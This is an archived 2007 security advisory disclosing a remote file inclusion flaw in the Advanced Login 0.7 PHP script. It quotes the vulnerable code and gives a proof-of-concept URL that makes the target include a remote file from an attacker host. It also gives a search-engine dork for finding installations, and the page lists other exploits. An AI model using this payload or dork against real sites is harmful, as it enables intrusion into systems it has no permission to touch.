exploits , vulnerabilities , articles , Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability

2006-04-28 Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit
2006-04-28 Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability
2003-08-11 Wu-ftpd v2.6.2 off-by-one remote Exploit (advanced version)

2007-03-30

Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability

Rated as : High Risk

------------------------------------------------------------------------------
Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability
------------------------------------------------------------------------------

Author		: Zeni Susanto a.k.a Bithedz
Date Found	: Maret, 29th 2007
Location	: Indonesia, Bandung
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application	: AdvanceLogin
version		: 0.7
vendor		: http://www.msxstudios.de
source url      : http://downloads.msxstudios.de/advancedlogin076.zip

---------------------------------------------------------------------------

Description:
~~~~~~~~
Advanced Login is at present for designers the best, for programmers and
successful Web masters one the best Login of systems on the market.
Templates which can be edited through simply and determined Functions can
adapt you to Advanced Login 100% to YOUR Design, not as differently with
usual systems around. Advanced Login is developed further and improved, an
installation is constantly worthwhile themselves thus, even if the present
function yet for your web page are not enough completely.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in profiledit.php

----------
profiledit.php---------------------------------------------------------
<?php
include($root."login/engine/couple.php");
mysql_query($profil_update_sql);
$result2=mysql_query($select_new_user_sql);
$row2=mysql_fetch_assoc($result2);
?>
 
-----------------------------------------------------------------------------

Input passed to the "root" parameter in profiledit.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~~~

http://target.com/login/engine/db/profiledit.php?root==http://attact.com/colok.txt?

-----------------------------------------------------------------------------

google d0rk:
~~~~~~~
"Advanced Login - Login"

-----------------------------------------------------------------------------
Solution:
~~~
- download new version in vendor URL 

-----------------------------------------------------------------------------
Shoutz:
~~
~ My Wife Monik 
~ K-159

-----------------------------------------------------------------------------

Contact:
~~~
 
     Bithedz[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------
securitydot.net - 2007-03-30

Exploits - newest 10 RSS | More

2007-06-15 56759 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33859 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41976 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29107 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19540 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16522 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19184 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16383 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33342 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17046 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit